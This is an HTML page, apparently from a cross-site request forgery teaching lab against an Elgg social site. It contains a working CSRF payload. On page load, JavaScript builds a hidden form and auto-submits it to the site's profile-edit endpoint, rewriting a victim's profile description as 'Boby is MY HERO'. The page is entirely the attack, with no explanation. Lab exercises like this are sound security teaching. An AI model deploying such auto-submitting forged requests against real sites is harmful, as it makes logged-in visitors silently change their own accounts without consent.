<!DOCTYPE html>
<html>
<head>
  <title>Hello ha!!!!!!</title>
</head>
<body>
  <h1>This page forges an HTTP POST request.</h1>

  <!-- JavaScript method-->
  <script type="text/javascript">
    function forge_post() {
      var fields;

      fields = "<input type='hidden' name='name' value='Alice'>";
      fields += "<input type='hidden' name='description'  value='Boby is MY HERO'>";
      fields += "<input type='hidden' name='accesslevel[description]' value='2'>";
      fields += "<input type='hidden' name='guid' value='42'>";

      var p = document.createElement("form");
      p.action = "http://www.csrflabelgg.com/action/profile/edit";
      p.innerHTML = fields;
      p.method = "post";
      document.body.appendChild(p);
      p.submit();
    }
    window.onload = function () { forge_post(); }
  </script>
</body>

</html>